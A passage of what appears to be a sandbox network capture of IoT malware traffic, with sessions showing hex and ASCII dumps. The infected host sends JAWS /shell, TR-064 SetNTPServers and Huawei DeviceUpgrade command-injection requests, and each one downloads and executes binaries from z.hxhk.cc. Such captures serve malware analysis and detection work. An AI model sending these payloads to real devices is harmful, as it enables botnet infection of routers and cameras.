65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.23	39668	124.87.30.108	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:59.366754055 CET	511	IN	Data Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 34 33 62 39 32 35 31 30 2d 61 39 34 62 2d 33 38 62 39 2d 61 63 62 62 2d 64 37 35 33 34 65 64 34 33 30 62 32 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 Data Ascii: (null) 400 Bad RequestServer: 43b92510-a94b-38b9-acbb-d7534ed430b2Date: Mon, 18 Mar 2024 08:56:56 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: close<HTML><HEAD><TITLE>400 Bad Request</TITLE><

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.23	52180	38.28.174.40	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:59.475469112 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:56:59.630248070 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 18 Mar 2024 08:56:57 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>
Mar 18, 2024 09:57:00.139745951 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 18 Mar 2024 08:56:57 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.23	52062	99.238.178.244	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:59.493617058 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.23	55384	103.112.224.208	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:59.546834946 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:56:59.897490025 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Sun, 17 Oct 2021 22:42:22 GMT Server: lighttpd/1.4.39 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.23	52138	99.238.178.244	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:59.615226984 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.23	39488	156.235.104.82	37215

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:59.726386070 CET	817	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Mar 18, 2024 09:57:03.978025913 CET	817	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Mar 18, 2024 09:57:10.133538961 CET	817	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Mar 18, 2024 09:57:22.165570974 CET	817	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Mar 18, 2024 09:57:47.250747919 CET	817	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Mar 18, 2024 09:58:36.380981922 CET	817	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 